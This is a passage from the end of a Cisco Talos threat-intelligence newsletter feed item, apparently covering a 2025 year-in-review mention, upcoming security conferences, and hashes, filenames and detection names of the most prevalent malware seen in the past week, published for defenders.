Different</u></strong>&#xA0;<strong><u>objectives, similar access paths</u></strong></a>&#xA0;&#xA0;<br>Across the Talos 2025 Year in Review, state-sponsored threat activity from China, Russia, North Korea, and Iran all had varying motivations, such as espionage, disruption, financial gain, and geopolitical influence.&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example Filename: VID001.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201**&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59&#xA0;&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</strong>&#xA0;&#xA0;<br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg**&#xA0;</p><p><strong>SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</strong>&#xA0;&#xA0;<br>MD5: 41444d7018601b599beac0c60ed1bf83&#xA0;&#xA0;<br>Talos Rep: https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55&#xA0;&#xA0;<br>Example Filename:&#xA0;content.js&#xA0;&#xA0;<br>Detection Name: W32.38D053135D-95.SBX.TG&#xA0;</p><p><strong>SHA256: 3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc</strong>&#xA0;<br>MD5: d749e0f8f2cd4e14178a787571534121&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc</u></a>&#xA0;<br>Example Filename:&#xA0;Unconfirmed 280575.crdownload.exe&#xA0;&#xA0;<br>Detection Name: W32.3C1DBC3F56-90.SBX.TG</p>]]></content:encoded></item></channel></rss>